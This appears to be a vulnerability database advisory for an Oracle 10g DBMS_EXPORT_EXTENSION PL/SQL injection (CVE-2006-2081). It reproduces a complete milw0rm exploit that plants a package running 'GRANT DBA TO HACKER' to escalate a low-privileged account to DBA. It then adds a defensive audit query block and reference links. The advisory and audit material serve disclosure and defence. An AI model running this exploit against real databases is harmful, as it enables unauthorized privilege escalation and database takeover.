Oracle 10g DBMS_EXPORT_EXTENSION Stored Procedure Remote SQL Injection Vulnerability

Vulnerability ID: 1110146
Vulnerability type: SQL injection
Published: 2006-04-26
Updated: 2006-04-28
CVE ID: CVE-2006-2081
CNNVD ID: CNNVD-200604-531
Platform: Multiple
CVSS score: 4.6
|Vulnerability sources
https://www.exploit-db.com/exploits/1719
https://cxsecurity.com/issue/WLB-2006050001
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200604-531
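|Vulnerability details
Oracle is a large commercial database system. The DBMS_EXPORT_EXTENSION stored procedure in Oracle 10g, which runs as the SYS user, contains a PL/SQL injection vulnerability that allows a low-privileged user to execute arbitrary SQL code with DBA privileges. Oracle stated that it had fixed this vulnerability in the April 2006 Critical Patch Update, but in fact it was not fixed.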
|Exploit
/* 0day, description is wrong. /str0ke */

/*
* Fucking NON-0 day($) exploit for Oracle 10g 10.2.0.2.0
*
* Patch your database now!
*
* by N1V1Hd $3c41r3
*
*/

CREATE OR REPLACE
PACKAGE MYBADPACKAGE AUTHID CURRENT_USER
IS
FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
RETURN NUMBER;
END;
/

CREATE OR REPLACE PACKAGE BODY MYBADPACKAGE
IS
FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
RETURN NUMBER
IS
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO HACKER';
COMMIT;
RETURN(1);
END;

END;
/

DECLARE
INDEX_NAME VARCHAR2(200);
INDEX_SCHEMA VARCHAR2(200);
TYPE_NAME VARCHAR2(200);
TYPE_SCHEMA VARCHAR2(200);
VERSION VARCHAR2(200);
NEWBLOCK PLS_INTEGER;
GMFLAGS NUMBER;
v_Return VARCHAR2(200);
BEGIN
INDEX_NAME := 'A1'; INDEX_SCHEMA := 'HACKER';
TYPE_NAME := 'MYBADPACKAGE'; TYPE_SCHEMA := 'HACKER';
VERSION := '10.2.0.2.0'; GMFLAGS := 1;

v_Return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(
INDEX_NAME => INDEX_NAME, INDEX_SCHEMA => INDEX_SCHEMA, TYPE_NAME
=> TYPE_NAME,
TYPE_SCHEMA => TYPE_SCHEMA, VERSION => VERSION, NEWBLOCK =>
NEWBLOCK, GMFLAGS => GMFLAGS
);
END;
/

// milw0rm.com [2006-04-26]
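
An audit sketch for the exposure described above, added here as an example and not part of the original advisory or exploit. It uses only standard Oracle data dictionary views; the list of excluded Oracle-supplied schemas and the commented-out REVOKE are assumptions to adapt and test locally.

```sql
-- Added audit example (not from the original advisory). Run as a DBA on the
-- database under review.

-- 1. Who may execute the SYS-owned package? A grant to PUBLIC means every
--    database account can call GET_DOMAIN_INDEX_METADATA.
SELECT grantee, privilege, grantor
  FROM dba_tab_privs
 WHERE owner = 'SYS'
   AND table_name = 'DBMS_EXPORT_EXTENSION'
 ORDER BY grantee;

-- 2. Packages outside Oracle-supplied schemas that define the ODCI callback
--    which the exploit passes in through TYPE_SCHEMA / TYPE_NAME.
--    Assumption: the NOT IN list is illustrative; extend it with the schemas
--    of any legitimately installed options or cartridges.
SELECT p.owner, p.object_name, o.created, o.last_ddl_time
  FROM dba_procedures p
  JOIN dba_objects o
    ON o.owner = p.owner
   AND o.object_name = p.object_name
   AND o.object_type = 'PACKAGE'
 WHERE UPPER(p.procedure_name) = 'ODCIINDEXGETMETADATA'
   AND p.owner NOT IN ('SYS', 'SYSTEM', 'CTXSYS', 'MDSYS', 'XDB', 'ORDSYS')
 ORDER BY o.last_ddl_time DESC;

-- 3. Accounts holding the DBA role, for comparison with the approved list.
--    An unexpected grantee here is the visible result of the exploit above.
SELECT grantee, admin_option, default_role
  FROM dba_role_privs
 WHERE granted_role = 'DBA'
 ORDER BY grantee;

-- Possible interim hardening (assumption, not taken from this page): remove
-- the PUBLIC grant found by query 1. Test first, since export tooling may
-- depend on the package.
-- REVOKE EXECUTE ON SYS.DBMS_EXPORT_EXTENSION FROM PUBLIC;
```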
|References

Source: US-CERT
Name: VU#932124
Link: http://www.kb.cert.org/vuls/id/932124
Source: BUGTRAQ
Name: 20060426 Recent Oracle exploit is _actually_ an 0day with no patch
Link: http://www.securityfocus.com/archive/1/archive/1/432078/100/0/threaded
Source: BUGTRAQ
Name: 20060419 Oracle 10g 10.2.0.2.0 DBA exploit
Link: http://www.securityfocus.com/archive/1/archive/1/431353/100/0/threaded
Source: MISC
Link: http://www.red-database-security.com/exploits/oracle-sql-injection-oracle-dbms_export_extension.html
Source: XF
Name: oracle-dbmsexportextension-sql-injection(26048)
Link: http://xforce.iss.net/xforce/xfdb/26048
Source: BID
Name: 17699
Link: http://www.securityfocus.com/bid/17699
Source: BUGTRAQ
Name: 20060501 RE: Oracle 10g 10.2.0.2.0 DBA exploit
Link: http://www.securityfocus.com/archive/1/archive/1/432632/30/5250/threaded
Source: BUGTRAQ
Name: 20060427 Re: Recent Oracle exploit is _actually_ an 0day with no patch
Link: http://www.securityfocus.com/archive/1/archive/1/432355/100/0/threaded
Source: BUGTRAQ
Name: 20060427 Re: Recent Oracle exploit is _actually_ an 0day with no patch
Link: http://www.securityfocus.com/archive/